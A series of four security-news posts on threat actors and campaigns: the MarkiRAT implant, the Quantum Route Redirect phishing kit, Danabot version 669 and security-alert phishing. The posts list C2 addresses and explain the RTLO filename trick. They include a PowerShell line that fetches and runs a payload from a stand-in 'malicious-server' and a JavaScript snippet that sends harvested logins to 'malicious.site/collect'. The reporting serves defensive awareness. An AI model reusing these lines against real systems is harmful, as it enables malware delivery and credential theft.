Ferocious Kitten has emerged as a significant cyber-espionage threat targeting Persian-speaking individuals within Iran since at least 2015.

The Iranian-linked advanced persistent threat group operates with a highly focused objective, utilizing politically themed decoy documents to manipulate victims into executing weaponized files.

Over the years, the group developed a sophisticated custom implant known as MarkiRAT, which provides extensive data collection capabilities including keystroke logging, clipboard data capture, screenshot functionality, and credential harvesting with staged data exfiltration through HTTP and HTTPS protocols.

The group’s attack methodology relies on spearphishing campaigns delivering malicious Microsoft Office documents embedded with Visual Basic for Applications macros.

These crafted emails target dissidents, activists, and individuals perceived as threats to the Iranian regime. Once a victim opens a weaponized document, the embedded macros execute with user-level privileges, establishing a system foothold.

The social engineering proves remarkably effective, as bait documents contain anti-regime propaganda that reinforces perceived legitimacy to targets.

Following initial execution, the malware deploys multiple persistence mechanisms.

Picus Security’s security analysts identified that MarkiRAT variants employ sophisticated hijacking techniques implanting the malware alongside legitimate applications.

Certain variants search for Telegram or Chrome installations, copy themselves into application directories, and modify shortcuts to execute the malware before launching the legitimate application.

This technique remains effective because users perceive applications functioning normally after execution.

Defense Evasion and Collection Mechanisms

The malware employs several evasion tactics to circumvent detection and security controls. One technique involves the Right-to-Left Override (RTLO) Unicode trick, which manipulates filename display within file explorers.

By inserting the Unicode character U+202E into executable filenames, attackers make malicious files appear as harmless media files such as images or videos.

A file named “MyVideo\u202E4pm.exe” displays as “MyVideoexe.mp4” to users, dramatically increasing execution probability among non-technical victims.

MarkiRAT’s collection capabilities represent its core functionality. The implant maintains persistent beaconing threads communicating with command-and-control servers using HTTP POST and GET requests.

The malware systematically records user keystrokes and clipboard contents, then exfiltrates this intelligence to remote servers.

Critically, Picus Security researchers noted that MarkiRAT targets specific credential storage formats including KeePass databases (.kdbx) and PGP key files (.gpg).

The malware terminates KeePass processes before keystroke logging begins, forcing users to re-enter master passwords, thereby capturing authentication credentials.

The group demonstrates adaptive operational security by checking for installed security software such as Kaspersky and Bitdefender.

Ferocious Kitten’s collection-focused methodology and sustained targeting reveal an organization prioritizing intelligence gathering, establishing this group as a persistent and evolving threat to Persian-speaking populations globally.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Ferocious Kitten APT Deploying MarkiRAT to Capture Keystroke and Clipboard Logging appeared first on Cyber Security News.

A sophisticated phishing campaign is targeting Microsoft 365 users worldwide through a newly discovered tool called Quantum Route Redirect.

This advanced automation platform transforms complex phishing operations into simple one-click attacks that evade traditional security measures.

The campaign has already affected victims across 90 countries, with the United States accounting for 76% of the targets.

The tool represents a dangerous shift in the phishing landscape by removing technical barriers that once limited cybercriminal activities. What previously required advanced expertise can now be executed by less experienced attackers using this pre-configured phishing kit.

The platform comes with ready-made phishing domains and automated systems that handle everything from traffic routing to victim tracking.

KnowBe4 Threat Lab security researchers first identified attacks using Quantum Route Redirect in early August 2025 through their PhishER Plus and Defend platforms.

The research team has since uncovered approximately 1,000 domains currently hosting this tool. The campaigns employ diverse social engineering tactics including DocuSign impersonation, payroll notifications, payment alerts, and QR code phishing to maximize victim engagement.

The attack infrastructure demonstrates concerning longevity potential, with developers planning upgrades that include QR code generation capabilities.

Victims receive phishing emails containing links that follow a consistent pattern: /([\w\d-]+\.){2}[\w]{,3}\/quantum.php/ hosted on parked or compromised legitimate domains.

This strategic choice leverages brand trust to increase success rates.

Intelligent Traffic Routing System

The core innovation behind Quantum Route Redirect lies in its sophisticated visitor classification system.

When someone clicks a malicious link, the platform immediately analyzes incoming traffic to differentiate between automated security scanners and human targets through real-time behavioral analysis.

The system routes security tools and bots to legitimate websites, making the original email appear harmless during automated URL scanning.

Meanwhile, genuine human visitors are directed straight to credential harvesting pages. This automated evasion technique successfully deceives both email security gateways and web application firewalls.

The platform performs browser fingerprinting and VPN/proxy detection automatically, enhancing its ability to identify security tools versus actual targets.

Cybercriminals monitor campaign effectiveness through an intuitive dashboard displaying comprehensive analytics including total impressions, victim locations, device types, and browser information.

This management interface provides two key components: a configuration panel for managing redirect rules and routing logic, plus visitor statistics for tracking traffic data and measuring campaign success rates.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post New Quantum Route Redirect Tool Lets Attackers Launch One-Click Phishing Attacks on Microsoft 365 Users appeared first on Cyber Security News.

Danabot, a notorious banking Trojan, has made a significant comeback with its new version 669 after a period of inactivity triggered by Operation Endgame’s law enforcement sweep in May 2025.

This advanced malware’s resurgence signals a new threat wave targeting financial institutions, cryptocurrency users, and individual victims using sophisticated multi-stage attacks.

Danabot tracks a legacy of credential theft, financial fraud, and information exfiltration, its latest evolution marks a technical refinement in both behavioral tactics and infrastructure.

The malware leverages multiple attack vectors to infect systems, including spear-phishing campaigns and malicious documents designed to deliver its payload.

Victims are lured into executing obfuscated attachments using convincing social engineering, which triggers the initial infection.

Once established, Danabot version 669 deploys several modules specializing in data harvesting, lateral movement across networks, and payload delivery tailored for Windows environments.

The malware also targets cryptocurrency wallets, amplifying its reach beyond traditional banking fraud.

Security researchers from Zscaler ThreatLabz identified and analyzed version 669, confirming its revival and exposing its technical underpinnings.

Notably, ThreatLabz documented shifts in Danabot’s command-and-control (C2) infrastructure.

The malware now employs a mix of conventional IP-based C2s and .onion addresses to manage payloads and data exfiltration, ensuring operational resilience and complicating mitigation efforts.

Key C2 addresses include 62.60.226[.]146:443, 62.60.226[.]154:443, and several .onion domains such as aqpfkxxtvahlzr6vobt6fhj4riev7wxzoxwItbcysuybirygxzvp23ad[.]onion:44.

Infection Mechanism Spotlight

At the core of Danabot’s infection process is a robust loader. Once executed, this loader downloads additional encrypted modules and configuration files from multiple C2 servers. The following code snippet represents the initial stage payload deployment:

Invoke-WebRequest -Uri 'http://malicious-server/payload' -OutFile 'C:\Users\Public\payload.exe'; Start-Process 'C:\Users\Public\payload.exe'

After establishing a foothold, Danabot injects itself into legitimate Windows processes as a persistence measure and leverages scheduled tasks for continual execution.

The modular design allows the threat actor to remotely manage new payloads and update infection parameters without direct user interaction.

This strategic flexibility, coupled with enhanced detection evasion through encrypted configuration and C2 communications, makes Danabot version 669 a formidable adversary in the current threat landscape.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Danabot Malware Resurfaced with Version 669 Following Operation Endgame appeared first on Cyber Security News.

A new wave of security alert-themed phishing emails has recently surfaced, causing concern within both enterprise and personal email environments.

These malicious emails cleverly impersonate official security notifications, often appearing to come from the victim’s own domain.

Their main objective is to instill panic by warning users about “blocked messages” and prompt recipients to take urgent action, such as clicking a provided link to resolve the issue.

This campaign demonstrates how perpetrators can skillfully exploit trust and urgency, increasing the likelihood that unsuspecting users will interact with harmful links.

In these campaigns, recipients are misled into believing their inbox is at risk. Upon clicking the disguised link, victims are redirected to a fake webmail login portal that’s designed to closely mirror legitimate pages.

Significantly, the portal is pre-filled with the recipient’s actual email address, adding to its authenticity.

Unit 42 security analysts noted this campaign’s effectiveness in bypassing basic suspicion by imitating legitimate internal warnings.

Their research identified that attackers deploy these phishing kits to harvest user credentials efficiently while maintaining a convincing facade.

Malicious Emails

Here the phishing email mimics genuine security alerts with deceptive subject lines and sender information.

Security alert-themed #phishing activity: emails appear to be sent from the recipient's own domain. These emails ask recipients to release blocked messages, but they lead to fake webmail login pages prefilled with the recipient's email address. Details at https://t.co/OYXKyMLgVK pic.twitter.com/RBxeZ87xku

— Unit 42 (@Unit42_Intel) November 10, 2025

Delving into the infection chain, the attack leverages HTML email attachments, which often contain embedded JavaScript.

Upon opening the attachment, malicious scripts execute in the recipient’s browser, capturing login details entered on the spoofed page.

A code snippet observed in these campaigns typically resembles:-

let creds = { email: document.getElementById('email').value, pass: document.getElementById('pass').value };
fetch('https://malicious.site/collect', { method: 'POST', body: JSON.stringify(creds) });

This script silently collects credentials and transmits them to an attacker-controlled server.

The threat from such phishing operations lies in both technical sophistication and psychological manipulation, making layered defenses and user vigilance critical for mitigation.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Beware of Security Alert-Themed Malicious Emails that Steal Your Email Logins appeared first on Cyber Security News.